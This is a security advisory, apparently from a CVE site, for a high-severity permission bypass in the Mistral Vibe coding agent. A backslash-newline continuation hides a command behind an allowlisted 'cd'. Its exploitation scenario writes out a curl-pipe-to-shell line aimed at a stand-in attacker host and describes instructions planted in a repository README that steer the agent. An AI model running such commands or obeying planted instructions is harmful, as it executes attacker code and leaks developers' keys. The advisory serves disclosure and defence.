CVE-2026-109428: Mistral Vibe: bash parsing bypass allows hidden commands
HIGHMistral Vibe, a coding agent CLI, can be tricked into running unapproved shell commands because its permission check parses commands differently than bash does. A backslash-newline continuation lets an attacker show an allowlisted prefix like 'cd' to the checker while bash executes a hidden command such as a curl download. The flaw is rated high (CVSS 8.8) and needs a user to process attacker-influenced content, for example a malicious repository or prompt. No EPSS score, public exploit, Nuclei template or KEV listing exists yet, so the immediate exploitation likelihood is unquantified, but the package has 464 downstream dependents and 11 other CVEs. Upgrade to Mistral Vibe 2.25.5 or later, and until then require manual approval for all shell commands and avoid running the agent on untrusted repositories.
What is the risk?
High. CVSS 8.8 with low complexity and no privileges required, but it needs user interaction, typically running the agent against attacker-influenced content. There is no known active exploitation (not in KEV), no public exploit, and no EPSS data, so likelihood is uncertain. The impact is arbitrary command execution under the developer's account, which commonly holds source code, API keys and cloud credentials. The package has a moderate risk score (32/100) and a history of 11 other CVEs.

What should I do?
1 step1) Upgrade mistral-vibe to 2.25.5 or later (fix in PR #1111, commit c069ffa). 2) Until patched, remove 'always allow' entries for shell commands (cd and similar) and require explicit approval for every bash call. 3) Run the agent in an isolated container or VM with least-privilege credentials and restricted egress. 4) Avoid pointing the agent at untrusted repositories or content. 5) Detection: monitor for unexpected curl/wget or child processes spawned by the agent, and for commands containing backslash-newline sequences in agent logs. 6) Inventory pip installations of mistral-vibe across developer endpoints and CI.

Original Advisory
Mistral Vibe before 2.25.5 contains a permission validation bypass vulnerability that allows attackers to execute unauthorized commands by exploiting a parsing discrepancy between tree-sitter-bash and bash in handling backslash-newline line continuations in the _extract_commands() function of bash.py. Attackers can craft a command string where tree-sitter-bash extracts only an allowlisted prefix such as cd while bash joins the line continuation into a materially different and hidden command such as a curl request, causing resolve_permission to grant ALWAYS permission while bash executes unauthorized arbitrary commands.
Exploitation Scenario
An attacker plants instructions in a public repository's README or an issue, telling the agent to run a command string like 'cd project \<newline> && curl https://evil.example/x.sh | sh'. tree-sitter-bash extracts only 'cd', which is allowlisted, so resolve_permission returns ALWAYS and no prompt is shown. Bash joins the line continuation and runs the hidden curl pipeline, installing a backdoor and exfiltrating environment variables and API keys from the developer's machine.
